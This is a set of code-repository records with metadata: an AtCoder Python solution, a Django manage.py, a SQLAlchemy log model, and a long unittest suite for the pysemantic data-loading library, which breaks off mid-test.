10f6230475b7cd896a058d46d101b08a3ccd9aa9 | 1885e952aa4a89f8b417b4c2e70b91bf1df887ff | /ABC163/D.py | 618f915abc6ca69fb1b9175433ddb970de9c633a | [] | no_license | takumiw/AtCoder | 01ed45b4d537a42e1120b1769fe4eff86a8e4406 | 23b9c89f07db8dd5b5345d7b40a4bae6762b2119 | refs/heads/master | 2021-07-10T12:01:32.401438 | 2020-06-27T14:07:17 | 2020-06-27T14:07:17 | 158,206,535 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | import sys
readline = sys.stdin.buffer.readline
MOD = 10 ** 9 + 7
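# Reasoning sketch: choosing k of the integers 0..N, the attainable sums form
# the contiguous range [k(k-1)/2, kN - k(k-1)/2], so each k >= K contributes
# (max - min + 1) distinct sums; summing this over k gives the answer.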
def main():
N, K = map(int, readline().rstrip().split())
ans = 0
m = (N * (N + 1)) // 2
for k in range(K, N+2):
mi = ((k-1) * k) // 2
ma = m - ((N-k) * (N-k+1)) // 2
ans += (ma - mi + 1)
print(ans % MOD)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
33f056391e83925927ed0a1ee7622d51726e6f1b | 8baa00a8c04f64e983532fa4a420c68f490bdaa8 | /devel/lib/python2.7/dist-packages/controller_manager_msgs/srv/__init__.py | 0d59dd77bd5bfaae8a46f01276a690a4799e786e | [] | no_license | samuel-cavalcanti/TIAGo | e52c778f40ba8e03af21ba275b45b7faac5625b3 | 575533f713338b28ee5709279a874c9e374d77bd | refs/heads/master | 2021-04-06T01:32:09.090002 | 2018-03-10T23:51:45 | 2018-03-10T23:51:45 | 124,707,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | /home/samuel/tiago_public_ws/devel/.private/controller_manager_msgs/lib/python2.7/dist-packages/controller_manager_msgs/srv/__init__.py | [
"[email protected]"
] | |
8a73ed73df99cfaa28920f158ae86bd17b3931a9 | 854a7abae6ac9611ee206e2fe8853b49bc556040 | /manage.py | 4f2f6156f0a150a56fc18926285ed3cd30f56216 | [] | no_license | crowdbotics-apps/vivek-2505 | 5e97f3f5333ed87969be90623be63f94ae3a54f3 | 668389589c44885ca9a3b2d0a60ff31389bc8b64 | refs/heads/master | 2020-05-15T21:33:27.596420 | 2019-04-21T07:20:39 | 2019-04-21T07:20:39 | 182,502,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "vivek_2505.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
5ae57a50894ee06d799ee88acb9132651d570cb8 | 78f54f911d47019da0deeeb6579c7e9e65bb8d21 | /src/scheduler/models/dao/common/Log.py | 1171ab5340bfce2bfeec5a4abb90b01fc98e85fa | [
"MIT"
] | permissive | jedicontributors/pythondataintegrator | 02f8ae1a50cf5ddd85341da738c24aa6a320c442 | 3e877b367ab9b20185476128ec053db41087879f | refs/heads/main | 2023-06-15T07:37:13.313988 | 2021-07-03T15:46:43 | 2021-07-03T15:46:43 | 354,021,102 | 0 | 0 | MIT | 2021-07-03T15:46:44 | 2021-04-02T13:03:12 | Python | UTF-8 | Python | false | false | 913 | py | from sqlalchemy import Column, String, Integer, DateTime
from IocManager import IocManager
from models.dao.Entity import Entity
class Log(Entity, IocManager.Base):
__tablename__ = "Log"
__table_args__ = {"schema": "Common"}
TypeId = Column(Integer, index=True, unique=False, nullable=False)
Content = Column(String(4000), index=False, unique=False, nullable=True)
LogDatetime = Column(DateTime, index=False, unique=False, nullable=True)
JobId = Column(Integer, index=True, unique=False, nullable=True)
def __init__(self,
                 TypeId: int = None,
Content: str = None,
LogDatetime: DateTime = None,
JobId: int = None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.TypeId = TypeId
self.Content = Content
self.LogDatetime = LogDatetime
self.JobId = JobId
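# Illustrative usage (values are arbitrary; assumes a configured SQLAlchemy
# session from the surrounding application):
#   session.add(Log(TypeId=1, Content="job finished", JobId=42))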
| [
"[email protected]"
] | |
ed2b58b2eac75fc198b26d5e62452595da90df0d | 3d5c57007b7792328b89eaa55ba27f852997f579 | /pysemantic/tests/test_project.py | 77103f1683b85a04ded533290d3744becd10be41 | [
"BSD-3-Clause"
] | permissive | abhishekarora12/pysemantic | 7b39bed7fe2911c996bd2caf8609f23f3ac58086 | 5e4a08401c6dee62e6e298312e9401e03e952d4b | refs/heads/master | 2020-12-28T22:34:24.415014 | 2015-09-02T07:34:29 | 2015-09-02T07:34:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,742 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2015 jaidev <jaidev@newton>
#
# Distributed under terms of the BSD 3-clause license.
"""Tests for the project class."""
import os.path as op
import os
import tempfile
import shutil
import warnings
import unittest
from ConfigParser import RawConfigParser, NoSectionError
from copy import deepcopy
import pandas as pd
import numpy as np
import yaml
from pandas.io.parsers import ParserWarning
import pysemantic.project as pr
from pysemantic.tests.test_base import (BaseProjectTestCase, TEST_DATA_DICT,
TEST_CONFIG_FILE_PATH, _dummy_postproc)
from pysemantic.errors import MissingProject
from pysemantic.utils import colnames
try:
from yaml import CLoader as Loader
from yaml import CDumper as Dumper
except ImportError:
from yaml import Loader
from yaml import Dumper
try:
import tables
PYTABLES_NOT_INSTALLED = False
except ImportError:
PYTABLES_NOT_INSTALLED = True
try:
import xlrd
XLRD_NOT_INSTALLED = False
except ImportError:
XLRD_NOT_INSTALLED = True
try:
import openpyxl
OPENPYXL_NOT_INSTALLED = False
except ImportError:
OPENPYXL_NOT_INSTALLED = True
class TestProjectModule(BaseProjectTestCase):
"""Tests for the project module level functions."""
def test_get_datasets(self):
"""Test the get_datasets function returns the correct datasets."""
datasets = pr.get_datasets("pysemantic")
ideal = ['person_activity', 'multi_iris', 'iris', 'bad_iris',
'random_row_iris']
self.assertItemsEqual(ideal, datasets)
def test_get_datasets_no_project(self):
"""Test if the get_datasets function works with no project name."""
dataset_names = pr.get_datasets()
self.assertTrue("pysemantic" in dataset_names)
ideal = ['person_activity', 'multi_iris', 'iris', 'bad_iris',
'random_row_iris']
self.assertItemsEqual(dataset_names['pysemantic'], ideal)
def test_add_dataset(self):
"""Test if adding datasets programmatically works fine."""
tempdir = tempfile.mkdtemp()
outpath = op.join(tempdir, "foo.csv")
dframe = pd.DataFrame(np.random.random((10, 10)))
dframe.to_csv(outpath, index=False)
specs = dict(path=outpath, delimiter=',', nrows=10)
try:
pr.add_dataset("pysemantic", "sample_dataset", specs)
parsed_specs = pr.get_schema_specs("pysemantic", "sample_dataset")
self.assertKwargsEqual(specs, parsed_specs)
finally:
shutil.rmtree(tempdir)
with open(TEST_DATA_DICT, "r") as fileobj:
test_specs = yaml.load(fileobj, Loader=Loader)
del test_specs['sample_dataset']
with open(TEST_DATA_DICT, "w") as fileobj:
yaml.dump(test_specs, fileobj, Dumper=Dumper,
default_flow_style=False)
def test_remove_dataset(self):
"""Test if programmatically removing a dataset works."""
with open(TEST_DATA_DICT, "r") as fileobj:
specs = yaml.load(fileobj, Loader=Loader)
try:
pr.remove_dataset("pysemantic", "iris")
self.assertRaises(KeyError, pr.get_schema_specs, "pysemantic",
"iris")
finally:
with open(TEST_DATA_DICT, "w") as fileobj:
yaml.dump(specs, fileobj, Dumper=Dumper,
default_flow_style=False)
def test_get_schema_spec(self):
"""Test the module level function to get schema specifications."""
specs = pr.get_schema_specs("pysemantic")
self.assertKwargsEqual(specs, self.data_specs)
def test_set_schema_fpath(self):
"""Test if programmatically setting a schema file to an existing
project works."""
old_schempath = pr.get_default_specfile("pysemantic")
try:
self.assertTrue(pr.set_schema_fpath("pysemantic", "/foo/bar"))
self.assertEqual(pr.get_default_specfile("pysemantic"),
"/foo/bar")
self.assertRaises(MissingProject, pr.set_schema_fpath,
"foobar", "/foo/bar")
finally:
conf_path = pr.locate_config_file()
parser = RawConfigParser()
parser.read(conf_path)
parser.remove_option("pysemantic", "specfile")
parser.set("pysemantic", "specfile", old_schempath)
with open(TEST_CONFIG_FILE_PATH, "w") as fileobj:
parser.write(fileobj)
def test_add_project(self):
"""Test if adding a project works properly."""
test_project_name = "test_project"
pr.add_project(test_project_name, TEST_DATA_DICT)
# Check if the project name is indeed present in the config file
test_dict = pr.get_default_specfile(test_project_name)
self.assertTrue(test_dict, TEST_DATA_DICT)
def test_remove_project(self):
"""Test if removing a project works properly."""
self.assertTrue(pr.remove_project("test_project"))
self.assertRaises(NoSectionError, pr.get_default_specfile,
"test_project")
class TestProjectClass(BaseProjectTestCase):
"""Tests for the project class and its methods."""
def test_index_column_exclude(self):
"""Test if values are excluded from index column if so specified."""
tempdir = tempfile.mkdtemp()
schema_fpath = op.join(tempdir, "schema.yml")
data_fpath = op.join(tempdir, "data.csv")
df = pd.DataFrame.from_dict({'index': np.arange(10), 'col_a':
np.arange(10)})
df.to_csv(data_fpath, index=False)
schema = {'data': {'path': data_fpath, 'index_col': 'index',
'column_rules': {'index': {'exclude': [1, 2]}}}}
with open(schema_fpath, "w") as fin:
yaml.dump(schema, fin, Dumper=Dumper, default_flow_style=False)
pr.add_project("index_exclude", schema_fpath)
try:
df = pr.Project("index_exclude").load_dataset("data")
self.assertItemsEqual(df.shape, (8, 1))
self.assertEqual(df.index.name, "index")
self.assertNotIn(1, df.index)
self.assertNotIn(2, df.index)
finally:
pr.remove_project("index_exclude")
shutil.rmtree(tempdir)
def test_index_column_rules(self):
"""Test if column rules specified for index columns are enforced."""
schema = {'iris': {'path': self.data_specs['iris']['path'],
'index_col': 'Species',
'dataframe_rules': {'drop_duplicates': False},
'column_rules': {'Species': {'regex': '.*e.*'}}}}
with tempfile.NamedTemporaryFile(delete=False) as f_schema:
yaml.dump(schema, f_schema, Dumper=Dumper, default_flow_style=False)
pr.add_project("index_col_rules", f_schema.name)
try:
project = pr.Project("index_col_rules")
df = project.load_dataset("iris")
self.assertEqual(df.index.name.lower(), 'species')
self.assertNotIn("virginica", df.index.unique())
self.assertItemsEqual(df.shape, (100, 4))
finally:
pr.remove_project("index_col_rules")
os.unlink(f_schema.name)
def test_indexcol_not_in_usecols(self):
"""
Test if the specified index column is added to the usecols
argument."""
schema = {'iris': {'path': self.data_specs['iris']['path'],
'index_col': 'Species',
'use_columns': ['Sepal Length', 'Petal Width']}}
with tempfile.NamedTemporaryFile(delete=False) as f_schema:
yaml.dump(schema, f_schema, Dumper=Dumper, default_flow_style=False)
pr.add_project("testindex_usecols", f_schema.name)
try:
project = pr.Project("testindex_usecols")
df = project.load_dataset("iris")
self.assertEqual(df.index.name, "Species")
self.assertItemsEqual(df.columns, ['Sepal Length', 'Petal Width'])
finally:
pr.remove_project("testindex_usecols")
os.unlink(f_schema.name)
def test_invalid_literals(self):
"""Test if columns containing invalid literals are parsed safely."""
tempdir = tempfile.mkdtemp()
schema_fpath = op.join(tempdir, "schema.yml")
data_fpath = op.join(tempdir, "data.csv")
data = pd.DataFrame.from_dict(dict(col_a=range(10)))
data['col_b'] = ["x"] * 10
data.to_csv(data_fpath, index=False)
schema = {'dataset': {'path': data_fpath, 'dtypes': {'col_a': int,
'col_b': int}}}
with open(schema_fpath, "w") as fin:
yaml.dump(schema, fin, Dumper=Dumper, default_flow_style=False)
pr.add_project("invalid_literal", schema_fpath)
try:
pr.Project("invalid_literal").load_dataset('dataset')
finally:
shutil.rmtree(tempdir)
pr.remove_project("invalid_literal")
def test_index_col(self):
"""Test if specifying the index_col works."""
iris_fpath = self.expected_specs['iris']['filepath_or_buffer']
specs = {'path': iris_fpath, 'index_col': 'Species',
'dataframe_rules': {'drop_duplicates': False}}
pr.add_dataset("pysemantic", "iris_indexed", specs)
try:
df = pr.Project('pysemantic').load_dataset('iris_indexed')
for specie in ['setosa', 'versicolor', 'virginica']:
self.assertEqual(df.ix[specie].shape[0], 50)
finally:
pr.remove_dataset('pysemantic', 'iris_indexed')
def test_multiindex(self):
"""Test if providing a list of indices in the schema returns a proper
multiindexed dataframe."""
pa_fpath = self.expected_specs['person_activity']['filepath_or_buffer']
index_cols = ['sequence_name', 'tag']
specs = {'path': pa_fpath, 'index_col': index_cols, 'delimiter': '\t'}
pr.add_dataset("pysemantic", "pa_multiindex", specs)
try:
df = pr.Project('pysemantic').load_dataset('pa_multiindex')
self.assertTrue(isinstance(df.index, pd.MultiIndex))
self.assertEqual(len(df.index.levels), 2)
seq_name, tags = df.index.levels
org_df = pd.read_table(specs['path'])
for col in index_cols:
x = org_df[col].unique().tolist()
y = df.index.get_level_values(col).unique().tolist()
self.assertItemsEqual(x, y)
finally:
pr.remove_dataset('pysemantic', 'pa_multiindex')
@unittest.skipIf(OPENPYXL_NOT_INSTALLED, "Loading Excel files requires openpyxl.")
def test_load_excel_multisheet(self):
"""Test combining multiple sheets into a single dataframe."""
tempdir = tempfile.mkdtemp()
spreadsheet = op.join(tempdir, "multifile_iris.xlsx")
iris = self.project.load_dataset("iris")
with pd.ExcelWriter(spreadsheet) as writer:
iris.to_excel(writer, "iris1", index=False)
iris.to_excel(writer, "iris2", index=False)
schema = {'iris': {'path': spreadsheet, 'sheetname': ['iris1', 'iris2'],
'dataframe_rules': {'drop_duplicates': False}}}
schema_fpath = op.join(tempdir, "multi_iris.yaml")
with open(schema_fpath, "w") as fout:
yaml.dump(schema, fout, Dumper=Dumper, default_flow_style=False)
pr.add_project("multi_iris", schema_fpath)
try:
ideal = pd.concat((iris, iris), axis=0)
actual = pr.Project('multi_iris').load_dataset("iris")
self.assertDataFrameEqual(ideal, actual)
finally:
pr.remove_project("multi_iris")
shutil.rmtree(tempdir)
@unittest.skipIf(XLRD_NOT_INSTALLED, "Reading Excel files requires xlrd.")
def test_load_excel_sheetname(self):
"""Test if specifying the sheetname loads the correct dataframe."""
xl_project = pr.Project("test_excel")
ideal_iris = self.project.load_dataset("iris")
actual_iris = xl_project.load_dataset("iris_renamed")
self.assertDataFrameEqual(ideal_iris, actual_iris)
@unittest.skipIf(XLRD_NOT_INSTALLED, "Reading Excel files requires xlrd.")
def test_load_excel(self):
"""Test if excel spreadsheets are read properly from the schema."""
xl_project = pr.Project("test_excel")
ideal_iris = self.project.load_dataset("iris")
actual_iris = xl_project.load_dataset("iris")
self.assertDataFrameEqual(ideal_iris, actual_iris)
def test_nrows_callable(self):
"""Check if specifying the nrows argument as a callable works."""
nrows = lambda x: np.remainder(x, 2) == 0
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = nrows
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 75)
ideal_ix = np.arange(150, step=2)
np.testing.assert_allclose(ideal_ix, loaded.index.values)
def test_random_row_selection_within_range(self):
"""Check if randomly selecting rows within a range works."""
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = {'range': [25, 75], 'count': 10, 'random': True}
iris_specs['header'] = 0
del iris_specs['dtypes']
iris_specs['column_names'] = colnames(iris_specs['path'])
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 10)
ix = loaded.index.values
self.assertTrue(ix.max() <= 50)
def test_row_selection_range(self):
"""Check if a range of rows can be selected from the dataset."""
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = {'range': [25, 75]}
iris_specs['header'] = 0
del iris_specs['dtypes']
iris_specs['column_names'] = colnames(iris_specs['path'])
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 50)
ideal_ix = np.arange(50)
self.assertTrue(np.allclose(loaded.index.values, ideal_ix))
def test_row_selection_random_range(self):
"""Check if a range of rows can be selected from the dataset."""
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = {'range': [25, 75], 'random': True}
iris_specs['header'] = 0
del iris_specs['dtypes']
iris_specs['column_names'] = colnames(iris_specs['path'])
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 50)
ideal_ix = np.arange(50)
self.assertFalse(np.all(loaded.index.values == ideal_ix))
def test_random_row_directive(self):
"""Check if the schema for randomizing rows works."""
loaded = self.project.load_dataset("random_row_iris")
self.assertEqual(loaded.shape[0], 50)
ideal_ix = np.arange(50)
self.assertFalse(np.all(loaded.index.values == ideal_ix))
def test_random_row_selection(self):
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = dict(random=True, count=50)
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 50)
ideal_ix = np.arange(50)
self.assertFalse(np.all(loaded.index.values == ideal_ix))
def test_export_dataset_csv(self):
"""Test if the default csv exporter works."""
tempdir = tempfile.mkdtemp()
project = pr.Project("pysemantic")
try:
dataset = "iris"
outpath = op.join(tempdir, dataset + ".csv")
project.export_dataset(dataset, outpath=outpath)
self.assertTrue(op.exists(outpath))
loaded = pd.read_csv(outpath)
self.assertDataFrameEqual(loaded, project.load_dataset(dataset))
finally:
shutil.rmtree(tempdir)
def test_exclude_cols(self):
"""Test if importing data with excluded columns works."""
filepath = op.join(op.abspath(op.dirname(__file__)), "testdata",
"iris.csv")
specs = {'path': filepath, 'exclude_columns': ['Species']}
pr.add_dataset('pysemantic', 'excl_iris', specs)
try:
project = pr.Project("pysemantic")
loaded = project.load_dataset("excl_iris")
self.assertNotIn('Species', loaded.columns)
finally:
pr.remove_dataset("pysemantic", "excl_iris")
def test_column_postprocessors(self):
"""Test if postprocessors work on column data properly."""
filepath = op.join(op.abspath(op.dirname(__file__)), "testdata",
"iris.csv")
col_rules = {'Species': {'postprocessors': [_dummy_postproc]}}
specs = {'path': filepath, 'column_rules': col_rules}
pr.add_dataset("pysemantic", "postproc_iris", specs)
try:
project = pr.Project("pysemantic")
loaded = project.load_dataset("postproc_iris")
processed = loaded['Species']
self.assertNotIn("setosa", processed.unique())
finally:
pr.remove_dataset("pysemantic", "postproc_iris")
def test_na_reps(self):
"""Test if the NA representations are parsed properly."""
project = pr.Project("pysemantic")
loaded = project.load_dataset("bad_iris")
self.assertItemsEqual(loaded.shape, (300, 5))
def test_na_reps_list(self):
"""Test if NA values work when specified as a list."""
tempdir = tempfile.mkdtemp()
df = pd.DataFrame(np.random.rand(10, 2))
ix = np.random.randint(0, df.shape[0], size=(5,))
ix = np.unique(ix)
df.iloc[ix, 0] = "foo"
df.iloc[ix, 1] = "bar"
fpath = op.join(tempdir, "test_na.csv")
df.to_csv(fpath, index=False)
schema = {'path': fpath, 'na_values': ["foo", "bar"],
'dataframe_rules': {'drop_na': False,
'drop_duplicates': False}}
schema_fpath = op.join(tempdir, "test_na.yaml")
with open(schema_fpath, "w") as fid:
yaml.dump({'test_na': schema}, fid, Dumper=Dumper,
default_flow_style=False)
pr.add_project("test_na", schema_fpath)
try:
df = pr.Project("test_na").load_dataset("test_na")
self.assertEqual(pd.isnull(df).sum().sum(), ix.shape[0] * 2)
finally:
pr.remove_project("test_na")
shutil.rmtree(tempdir)
def test_global_na_reps(self):
"""Test is specifying a global NA value for a dataset works."""
tempdir = tempfile.mkdtemp()
df = pd.DataFrame(np.random.rand(10, 10))
ix = np.random.randint(0, df.shape[0], size=(5,))
ix = np.unique(ix)
for i in xrange(ix.shape[0]):
df.iloc[ix[i], ix[i]] = "foobar"
fpath = op.join(tempdir, "test_na.csv")
df.to_csv(fpath, index=False)
schema = {'path': fpath, 'na_values': "foobar",
'dataframe_rules': {'drop_na': False,
'drop_duplicates': False}}
schema_fpath = op.join(tempdir, "test_na.yaml")
with open(schema_fpath, "w") as fid:
yaml.dump({'test_na': schema}, fid, Dumper=Dumper,
default_flow_style=False)
pr.add_project("test_na", schema_fpath)
try:
df = pr.Project("test_na").load_dataset("test_na")
self.assertEqual(pd.isnull(df).sum().sum(), ix.shape[0])
finally:
pr.remove_project("test_na")
shutil.rmtree(tempdir)
def test_error_bad_lines_correction(self):
"""test if the correction for bad lines works."""
tempdir = tempfile.mkdtemp()
iris_path = op.join(op.abspath(op.dirname(__file__)), "testdata",
"iris.csv")
with open(iris_path, "r") as fid:
iris_lines = fid.readlines()
outpath = op.join(tempdir, "bad_iris.csv")
iris_lines[50] = iris_lines[50].rstrip() + ",0,23,\n"
with open(outpath, 'w') as fid:
fid.writelines(iris_lines)
data_dict = op.join(tempdir, "dummy_project.yaml")
specs = {'bad_iris': {'path': outpath}}
with open(data_dict, "w") as fid:
yaml.dump(specs, fid, Dumper=Dumper, default_flow_style=False)
pr.add_project('dummy_project', data_dict)
try:
project = pr.Project('dummy_project')
df = project.load_dataset('bad_iris')
self.assertItemsEqual(df.shape, (146, 5))
finally:
shutil.rmtree(tempdir)
pr.remove_project('dummy_project')
@unittest.skipIf(PYTABLES_NOT_INSTALLED, "HDF export requires PyTables.")
def test_export_dataset_hdf(self):
"""Test if exporting the dataset to hdf works."""
tempdir = tempfile.mkdtemp()
project = pr.Project("pysemantic")
try:
for dataset in project.datasets:
if dataset not in ("bad_iris", "random_row_iris"):
outpath = op.join(tempdir, dataset + ".h5")
project.export_dataset(dataset, outpath=outpath)
self.assertTrue(op.exists(outpath))
group = r'/{0}/{1}'.format(project.project_name, dataset)
loaded = pd.read_hdf(outpath, group)
self.assertDataFrameEqual(loaded,
project.load_dataset(dataset))
finally:
shutil.rmtree(tempdir)
def test_reload_data_dict(self):
"""Test if the reload_data_dict method works."""
project = pr.Project("pysemantic")
tempdir = tempfile.mkdtemp()
datapath = op.join(tempdir, "data.csv")
ideal = pd.DataFrame(np.random.randint(0, 9, size=(10, 5)),
columns=map(str, range(5)))
ideal.to_csv(datapath, index=False)
with open(TEST_DATA_DICT, "r") as fid:
specs = yaml.load(fid, Loader=Loader)
specs['fakedata'] = dict(path=datapath)
with open(TEST_DATA_DICT, "w") as fid:
yaml.dump(specs, fid, Dumper=Dumper)
try:
project.reload_data_dict()
actual = project.load_dataset("fakedata")
self.assertDataFrameEqual(ideal, actual)
finally:
shutil.rmtree(tempdir)
del specs['fakedata']
with open(TEST_DATA_DICT, "w") as fid:
yaml.dump(specs, fid, Dumper=Dumper)
def test_update_dataset(self):
"""Test if the update_dataset method works."""
tempdir = tempfile.mkdtemp()
_pr = pr.Project("pysemantic")
iris = _pr.load_dataset("iris")
x = np.random.random((150,))
y = np.random.random((150,))
iris['x'] = x
iris['y'] = y
org_cols = iris.columns.tolist()
outpath = op.join(tempdir, "iris.csv")
with open(TEST_DATA_DICT, "r") as fid:
org_specs = yaml.load(fid, Loader=Loader)
try:
_pr.update_dataset("iris", iris, path=outpath, sep='\t')
_pr = pr.Project("pysemantic")
iris = _pr.load_dataset("iris")
self.assertItemsEqual(org_cols, iris.columns.tolist())
iris_validator = _pr.validators['iris']
updated_args = iris_validator.parser_args
self.assertEqual(updated_args['dtype']['x'], float)
self.assertEqual(updated_args['dtype']['y'], float)
self.assertEqual(updated_args['sep'], '\t')
self.assertEqual(updated_args['filepath_or_buffer'], outpath)
finally:
shutil.rmtree(tempdir)
with open(TEST_DATA_DICT, "w") as fid:
yaml.dump(org_specs, fid, Dumper=Dumper,
default_flow_style=False)
def test_update_dataset_deleted_columns(self):
"""Test if the update dataset method removes column specifications."""
tempdir = tempfile.mkdtemp()
_pr = pr.Project("pysemantic")
iris = _pr.load_dataset("iris")
outpath = op.join(tempdir, "iris.csv")
with open(TEST_DATA_DICT, "r") as fid:
org_specs = yaml.load(fid, Loader=Loader)
try:
del iris['Species']
_pr.update_dataset("iris", iris, path=outpath)
pr_reloaded = pr.Project("pysemantic")
iris_reloaded = pr_reloaded.load_dataset("iris")
self.assertNotIn("Species", iris_reloaded.columns)
self.assertNotIn("Species", pr_reloaded.column_rules["iris"])
finally:
shutil.rmtree(tempdir)
with open(TEST_DATA_DICT, "w") as fid:
yaml.dump(org_specs, fid, Dumper=Dumper,
default_flow_style=False)
def test_regex_separator(self):
"""Test if the project properly loads a dataset when it encounters
regex separators.
"""
tempdir = tempfile.mkdtemp()
outfile = op.join(tempdir, "sample.txt")
data = ["col1"] + map(str, range(10))
with open(outfile, "w") as fileobj:
fileobj.write("\n".join(data))
specs = dict(path=outfile, delimiter=r'\n', dtypes={'col1': int})
pr.add_dataset("pysemantic", "sample_dataset", specs)
try:
with warnings.catch_warnings(record=True) as catcher:
_pr = pr.Project("pysemantic")
dframe = _pr.load_dataset("sample_dataset")
assert len(catcher) == 2
assert issubclass(catcher[1].category, ParserWarning)
data.remove("col1")
self.assertItemsEqual(map(int, data), dframe['col1'].tolist())
finally:
pr.remove_dataset("pysemantic", "sample_dataset")
shutil.rmtree(tempdir)
def test_load_dataset_wrong_dtypes_in_spec(self):
"""Test if the Loader can safely load columns that have a wrongly
specified data type in the schema.
"""
# Make a file with two columns, both specified as integers in the
# dtypes, but one has random string types.
x = np.random.randint(0, 10, size=(100, 2))
dframe = pd.DataFrame(x, columns=['a', 'b'])
tempdir = tempfile.mkdtemp()
outfile = op.join(tempdir, "testdata.csv")
_ix = np.random.randint(0, 100, size=(5,))
dframe['b'][_ix] = "aa"
dframe.to_csv(outfile, index=False)
specs = dict(delimiter=',', dtypes={'a': int, 'b': int}, path=outfile)
specfile = op.join(tempdir, "dict.yaml")
with open(specfile, "w") as fileobj:
yaml.dump({'testdata': specs}, fileobj, Dumper=Dumper,
default_flow_style=False)
pr.add_project("wrong_dtype", specfile)
try:
_pr = pr.Project("wrong_dtype")
with warnings.catch_warnings(record=True) as catcher:
dframe = _pr.load_dataset("testdata")
assert len(catcher) == 1
assert issubclass(catcher[-1].category, UserWarning)
finally:
pr.remove_project("wrong_dtype")
shutil.rmtree(tempdir)
def test_integer_col_na_values(self):
"""Test if the Loader can load columns with integers and NAs.
This is necessary because NaNs cannot be represented by integers."""
x = map(str, range(20))
x[13] = ""
df = pd.DataFrame.from_dict(dict(a=x, b=x))
tempdir = tempfile.mkdtemp()
outfile = op.join(tempdir, "testdata.csv")
df.to_csv(outfile, index=False)
specfile = op.join(tempdir, "dict.yaml")
specs = dict(delimiter=',', dtypes={'a': int, 'b': int}, path=outfile)
with open(specfile, "w") as fileobj:
yaml.dump({'testdata': specs}, fileobj, Dumper=Dumper,
default_flow_style=False)
pr.add_project("wrong_dtype", specfile)
try:
_pr = pr.Project("wrong_dtype")
df = _pr.load_dataset("testdata")
self.assertEqual(df['a'].dtype, float)
self.assertEqual(df['b'].dtype, float)
finally:
pr.remove_project("wrong_dtype")
shutil.rmtree(tempdir)
def test_load_dataset_missing_nrows(self):
"""Test if the project loads datasets properly if the nrows parameter
is not provided in the schema.
"""
# Modify the schema to remove the nrows
with open(TEST_DATA_DICT, "r") as fileobj:
org_specs = yaml.load(fileobj, Loader=Loader)
new_specs = deepcopy(org_specs)
for dataset_specs in new_specs.itervalues():
if "nrows" in dataset_specs:
del dataset_specs['nrows']
with open(TEST_DATA_DICT, "w") as fileobj:
yaml.dump(new_specs, fileobj, Dumper=Dumper,
default_flow_style=False)
try:
_pr = pr.Project("pysemantic")
dframe = pd.read_csv(**self.expected_specs['iris'])
loaded = _pr.load_dataset("iris")
self.assertDataFrameEqual(dframe, loaded)
dframe = pd.read_table(**self.expected_specs['person_activity'])
loaded = _pr.load_dataset("person_activity")
self.assertDataFrameEqual(loaded, dframe)
finally:
with open(TEST_DATA_DICT, "w") as fileobj:
yaml.dump(org_specs, fileobj, Dumper=Dumper,
default_flow_style=False)
def test_get_project_specs(self):
"""Test if the project manager gets all specifications correctly."""
specs = self.project.get_project_specs()
del specs['bad_iris']
del specs['random_row_iris']
del specs['multi_iris']
for name, argdict in specs.iteritems():
self.assertKwargsEqual(argdict, self.expected_specs[name])
def test_get_dataset_specs(self):
"""Check if the project manager produces specifications for each
dataset correctly.
"""
for name in ['iris', 'person_activity']:
self.assertKwargsEqual(self.project.get_dataset_specs(name),
self.expected_specs[name])
def test_get_multifile_dataset_specs(self):
"""Test if the multifile dataset specifications are valid."""
outargs = self.project.get_dataset_specs("multi_iris")
for argset in outargs:
argset['usecols'] = colnames(argset['filepath_or_buffer'])
self.assertTrue(isinstance(outargs, list))
self.assertEqual(len(outargs), len(self.expected_specs['multi_iris']))
for i in range(len(outargs)):
self.assertKwargsEqual(outargs[i],
self.expected_specs['multi_iris'][i])
def test_load_all(self):
"""Test if loading all datasets in a project works as expected."""
loaded = self.project.load_datasets()
self.assertItemsEqual(loaded.keys(), ('iris', 'person_activity',
'multi_iris', 'bad_iris',
'random_row_iris'))
dframe = pd.read_csv(**self.expected_specs['iris'])
self.assertDataFrameEqual(loaded['iris'], dframe)
dframe = pd.read_csv(**self.expected_specs['person_activity'])
self.assertDataFrameEqual(loaded['person_activity'], dframe)
dframes = [pd.read_csv(**args) for args in
self.expected_specs['multi_iris']]
dframes = [x.drop_duplicates() for x in dframes]
dframe = pd.concat(dframes)
dframe.set_index(np.arange(dframe.shape[0]), inplace=True)
self.assertDataFrameEqual(loaded['multi_iris'], dframe)
def test_init_project_yaml_dump(self):
"""Test initialization of Project class with the raw yaml dump."""
project_specs = pr.get_schema_specs('pysemantic')
project = pr.Project(schema=project_specs)
loaded = project.load_datasets()
self.assertItemsEqual(loaded.keys(), ('iris', 'person_activity',
'multi_iris', 'bad_iris',
'random_row_iris'))
dframe = pd.read_csv(**self.expected_specs['iris'])
